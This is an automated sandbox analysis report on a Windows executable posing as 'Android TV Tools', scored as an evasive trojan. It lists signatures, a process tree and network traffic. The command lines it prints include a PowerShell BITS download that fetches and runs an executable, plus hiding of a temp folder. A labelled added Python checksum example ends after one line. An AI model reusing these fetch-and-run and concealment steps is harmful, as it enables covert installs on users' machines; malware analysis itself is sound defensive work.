Windows Analysis Report
Android TV Tools v3_ES.exe

Overview

General Information

Sample name: Android TV Tools v3_ES.exe
Analysis ID: 1447534
MD5: 66773f373de9e1aa11b3f2e6f74967af
SHA1: cf366b0155f9ab7a2376191120e91bd241f2da8b
SHA256: 0010eec766b8e255d945d0c5ed3ca892329892c4a106988159a26f8758b52282

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for submitted file
Contains functionality to detect sleep reduction / modifications
Found API chain indicative of debugger detection
Loading BitLocker PowerShell Module
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Android TV Tools v3_ES.exe (PID: 1896 cmdline: "C:\Users\user\Desktop\Android TV Tools v3_ES.exe" MD5: 66773F373DE9E1AA11B3F2E6F74967AF)
    • conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1852 cmdline: C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\afolder" mkdir "C:\Users\user\AppData\Local\Temp\afolder" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 2020 cmdline: C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\ytmp" mkdir "C:\Users\user\AppData\Local\Temp\ytmp" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 3304 cmdline: C:\Windows\system32\cmd.exe /c attrib +h C:\Users\user\AppData\Local\Temp\ytmp MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • attrib.exe (PID: 6196 cmdline: attrib +h C:\Users\user\AppData\Local\Temp\ytmp MD5: 0E938DD280E83B1596EC6AA48729C2B0)
    • cmd.exe (PID: 3012 cmdline: C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 6564 cmdline: C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 3008 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • PING.EXE (PID: 5708 cmdline: ping google.com -n 1 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • powershell.exe (PID: 4080 cmdline: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmdmax.exe (PID: 5252 cmdline: "Android TV Tools - Aux Files\cmdmax.exe" 20 234 120 31 120 9999 MD5: 34348DD557468D401AE4BFAE2E850EEE)
  • svchost.exe (PID: 6360 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", CommandLine: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3008, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", ProcessId: 4080, ProcessName: powershell.exe
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", CommandLine: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3008, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", ProcessId: 4080, ProcessName: powershell.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\afolder" mkdir "C:\Users\user\AppData\Local\Temp\afolder", CommandLine: C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\afolder" mkdir "C:\Users\user\AppData\Local\Temp\afolder", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Android TV Tools v3_ES.exe", ParentImage: C:\Users\user\Desktop\Android TV Tools v3_ES.exe, ParentProcessId: 1896, ParentProcessName: Android TV Tools v3_ES.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\afolder" mkdir "C:\Users\user\AppData\Local\Temp\afolder", ProcessId: 1852, ProcessName: cmd.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", CommandLine: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3008, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", ProcessId: 4080, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6360, ProcessName: svchost.exe
No Snort rule has matched

AV Detection

Source: Android TV Tools v3_ES.exe | Virustotal: Detection: 13%
Source: Android TV Tools v3_ES.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49708 version: TLS 1.2

Networking

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping google.com -n 1
Source: Joe Sandbox View | IP Address: 185.199.108.133
Source: Joe Sandbox View | IP Address: 140.82.121.4
Source: Joe Sandbox View | ASN Name: GITHUBUS
Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
  GET /tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Encoding: identity
  If-Unmodified-Since: Wed, 08 Dec 2021 04:12:16 GMT
  User-Agent: Microsoft BITS/7.8
  Host: github.com
Source: global traffic | HTTP traffic detected:
  GET /github-production-release-asset-2e65be/50417431/6e51c424-c3ca-11e5-97ed-aaf014dfa1f3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240525%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240525T185903Z&X-Amz-Expires=300&X-Amz-Signature=fff4a0719c293d9eda64204276fdc932c8a5e83c54ec30c201cfc9b24ace8e09&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=50417431&response-content-disposition=attachment%3B%20filename%3Dcmdmax-x86.exe&response-content-type=application%2Foctet-stream HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Encoding: identity
  If-Unmodified-Since: Wed, 08 Dec 2021 04:12:16 GMT
  User-Agent: Microsoft BITS/7.8
  Host: objects.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: google.com
Source: global traffic | DNS traffic detected: DNS query: github.com
Source: global traffic | DNS traffic detected: DNS query: objects.githubusercontent.com
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Code function: 0_2_0040A05E
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Code function: 0_2_0040C1E5
Source: Android TV Tools v3_ES.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine | Classification label: mal88.troj.evad.winEXE@23/14@3/4
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\Desktop\Android TV Tools - Aux Files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1372:120:WilError_03
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | File created: C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat"
Source: Android TV Tools v3_ES.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Android TV Tools v3_ES.exe | Virustotal: Detection: 13%
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | File read: C:\Users\user\Desktop\Android TV Tools v3_ES.exe
Source: C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exe | Evasive API call chain: GetCommandLine, DecisionNodes, ExitProcess (graph_14-1734)
Source: unknown | Process created: C:\Users\user\Desktop\Android TV Tools v3_ES.exe "C:\Users\user\Desktop\Android TV Tools v3_ES.exe"
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\afolder" mkdir "C:\Users\user\AppData\Local\Temp\afolder"
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\ytmp" mkdir "C:\Users\user\AppData\Local\Temp\ytmp"
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c attrib +h C:\Users\user\AppData\Local\Temp\ytmp
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\attrib.exe attrib +h C:\Users\user\AppData\Local\Temp\ytmp
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat"
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe"
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping google.com -n 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exe "Android TV Tools - Aux Files\cmdmax.exe" 20 234 120 31 120 9999
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exeSection loaded: apphelp.dllJump to behavior
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Code function: 0_2_0040B641 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress (APIs resolved at run time rather than through the import table, so a static import listing understates what this binary calls)
Source: BITC7F8.tmp.12.dr | Static PE information: stored header checksum 0x0, computed checksum 0xe0ce (the field was never written; this is the cmdmax-x86.exe download before BITS renamed it, linked without a checksum)
Source: Android TV Tools v3_ES.exe | Static PE information: stored header checksum 0x1c605, computed checksum 0x6f1cc (a non-zero but wrong value means the image was changed after linking, e.g. by a packer or by a wrapper that appends a payload to a stub)
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Code function: 0_2_00405810 push eax; ret 0_2_0040583E (push/ret used in place of a direct call or jmp)
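The two checksum lines above come from recomputing the PE header checksum and comparing it with the stored field. The following is an added example, not code from the report, from Joe Sandbox or from either binary: it implements the standard CheckSumMappedFile fold in Python, builds a throwaway PE32 skeleton in memory (constructed and not loadable; the header layout constants and the 13-byte payload are the example's own assumptions), and returns the three verdicts an analyst cares about: unset, matching, and mismatching. verify_file() is the entry point to use on a real sample.

```python
"""Recompute a PE image checksum and compare it with the header field.

Added example, not from the report or from Joe Sandbox. It implements the
standard CheckSumMappedFile fold (16-bit one's-complement sum of the whole
file, skipping the CheckSum field, plus the file length) and exercises it on
a minimal PE32 image constructed in memory; no real sample is required.
"""
import struct

OPT_HDR_SIZE_PE32 = 224        # SizeOfOptionalHeader for PE32 (constructed image only)
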